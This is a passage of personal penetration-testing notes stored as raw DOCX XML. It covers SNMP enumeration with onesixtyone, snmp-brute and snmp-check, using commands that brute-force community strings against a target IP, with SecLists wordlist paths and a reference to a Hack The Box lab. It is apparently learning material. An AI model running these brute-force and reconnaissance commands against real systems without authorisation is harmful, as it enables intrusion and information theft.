          <w:numId w:val="482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY verbose since it displays every single line whether it fails or not since -dd stands for debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="526" name="image511.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image511.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108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30B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, while this one lone line is far away from the "public" string attempt, it's because onesixtyone doesn't wait for response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find out which community string this long output belongs to, look at the first highlight, which says</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [public]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning it's part of the public community</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if you look at this output, the public string output shows up multiple times, because in the wordlist it contains strings like public, PUBLIC, Public, and such</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_55k3npju58sx" w:id="432"/>
      <w:bookmarkEnd w:id="432"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BB">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It uses metasploit so that counts as a metasploit usage on XXXXXXXXX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1081">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mentor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB (in the 20:00 minute mark), they ran snmp-brute and found a community string other than "public".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they ran onesixtyone and it only found public. So, I think it's best to do BOTH onesixtyone and snmp-brute. Also, snmp-brute also tells version numbers which I like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C1">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7672388" cy="3725534"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="210" name="image211.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image211.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1082"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7672388" cy="3725534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 snmpbrute.py -t &lt;IP&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1374"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses default wordlist built into the python code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 snmpbrute.py -t &lt;IP&gt; -f /usr/share/seclists/Discovery/SNMP/snmp.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses snmp.txt seclists wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seclists wordlists for SNMP found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Discovery/SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are 4 wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">common-snmp-community-strings.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in the video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is the biggest one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvb16ppsthnm" w:id="433"/>
      <w:bookmarkEnd w:id="433"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorite tool because of how nicely formatted it is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp-check 192.168.118.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will give you a BUNCH of output formatted really nice like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Routing information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP connections and listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listening UDP ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="783"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Processes (running processes, like ps aux)</w:t>
      </w:r>
    </w:p>
